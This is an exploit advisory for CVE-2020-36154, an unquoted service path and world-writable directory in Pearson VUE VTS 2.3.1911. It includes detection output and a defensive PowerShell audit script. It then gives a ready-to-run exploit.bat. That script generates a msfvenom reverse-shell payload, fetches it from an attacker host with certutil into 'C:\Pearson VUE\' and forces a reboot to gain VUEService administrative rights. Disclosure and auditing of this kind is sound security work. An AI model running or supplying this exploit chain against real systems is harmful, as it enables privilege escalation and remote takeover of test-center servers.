Pearson Vue - VUEApplicationWrapper Unquoted Service Path (CVE-2020-36154)
Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path
The Application Wrapper is the component that automates the Pearson VUE Testing System. The Wrapper is a scheduler that runs in the background on the test center's server. The VUEApplicationWrapper service has an unquoted service path, and the "\Pearson VUE\" directory has insecure file permissions that allow Everyone to write to it, so an unauthorized local user can escalate privileges to the VUEService user, which has administrative rights.
# Detection of unquoted service path:

C:\Users\VUEService>wmic service get name, pathname, displayname, startmode| findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Pearson" |findstr /i /v """
VUE Application Wrapper    VUEApplicationWrapper    C:\Pearson VUE\VUE Testing System\bin\VUEWrapper.exe    Auto

C:\Users\VUEService>sc qc VUEApplicationWrapper
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VUEApplicationWrapper
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Pearson VUE\VUE Testing System\bin\VUEWrapper.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VUE Application Wrapper
        DEPENDENCIES       : lanmanworkstation
        SERVICE_START_NAME : .\VUEService

# Detection of insecure file permissions:

PS C:\Users\VUEService> Get-Acl -Path "c:\Pearson Vue\"

    Directory: C:\

Path        Owner                  Access
----        -----                  ------
Pearson Vue BUILTIN\Administrators Everyone Allow  FullControl...
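The two checks above can be generalized into one read-only audit that covers every service on a host. This is an added example, not code from the advisory or from Pearson VUE. The list of low-privilege SIDs and the "path ends at the first .exe" heuristic are assumptions of the example.

```powershell
# Added example (not from the advisory). Read-only: changes nothing on the host.
# Assumed low-privilege SIDs: Everyone, Authenticated Users, BUILTIN\Users.
$weakSids  = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545'
# CreateFiles/WriteData, GENERIC_WRITE, GENERIC_ALL.
$writeMask = 0x2 -bor 0x40000000 -bor 0x10000000
$sidType   = [System.Security.Principal.SecurityIdentifier]
$inhOnly   = [int][System.Security.AccessControl.PropagationFlags]::InheritOnly

Get-CimInstance -ClassName Win32_Service | ForEach-Object {
    $svc = $_
    # Empty or already quoted paths are not affected.
    if (-not $svc.PathName -or $svc.PathName.StartsWith('"')) { return }
    # Heuristic (assumption): the image path ends at the first ".exe".
    if ($svc.PathName -notmatch '^(?<exe>.+?\.exe)(?<args>.*)$') { return }
    $exe, $rest = $Matches['exe'], $Matches['args']
    if (-not $exe.Contains(' ')) { return }

    # Windows tries each space-delimited prefix of an unquoted path as a program
    # name, so the parent directory of every prefix has to be locked down.
    $dirs = for ($i = $exe.IndexOf(' '); $i -ge 0; $i = $exe.IndexOf(' ', $i + 1)) {
        [System.IO.Path]::GetDirectoryName($exe.Substring(0, $i))
    }
    foreach ($dir in ($dirs | Where-Object { $_ } | Sort-Object -Unique)) {
        if (-not (Test-Path -LiteralPath $dir -PathType Container)) { continue }
        $rules = (Get-Acl -LiteralPath $dir).GetAccessRules($true, $true, $sidType)
        foreach ($ace in $rules) {
            # Flag Allow ACEs that let a weak principal create files in this directory.
            $hit = $ace.AccessControlType -eq 'Allow' -and
                   $weakSids -contains $ace.IdentityReference.Value -and
                   ([int]$ace.FileSystemRights -band $writeMask) -ne 0 -and
                   ([int]$ace.PropagationFlags -band $inhOnly) -eq 0
            if ($hit) {
                [pscustomobject]@{
                    Service     = $svc.Name
                    RunsAs      = $svc.StartName
                    StartMode   = $svc.StartMode
                    WritableDir = $dir
                    Sid         = $ace.IdentityReference.Value
                    Rights      = $ace.FileSystemRights
                    QuotedPath  = '"{0}"{1}' -f $exe, $rest
                }
            }
        }
    }
} | Format-List
```

Each result names a service to fix in two ways: set its ImagePath to the QuotedPath value, and remove write access for the listed SID from WritableDir.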
exploit.bat:
@ECHO OFF
ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """
sc qc VUEApplicationWrapper
powershell.exe -ep bypass -nop -c "Get-Acl -Path 'c:\Pearson Vue\'"
ECHO [+] Enumeration was completed successfully.
::Create VUE.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell.
::msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Your IP Address> LPORT=443 -f exe > VUE.exe
ECHO [*] If you create VUE.exe under "\Pearson VUE\" directory with your privileges, you might be able to get VUEService user privileges after windows was rebooted.
certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/VUE.exe "C:\Pearson VUE\VUE.exe"
ECHO [*] Downloading VUE executable...
PAUSE
IF EXIST "C:\Pearson VUE\VUE.exe" (
    ECHO [+] The download was successful.
) ELSE (
    ECHO [-] The download was unsuccessful.
    PAUSE
)
ECHO [!] If you continue, system will be rebooted.
PAUSE
shutdown /r /t 0
::code end
Reference: Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path (Exploit Database)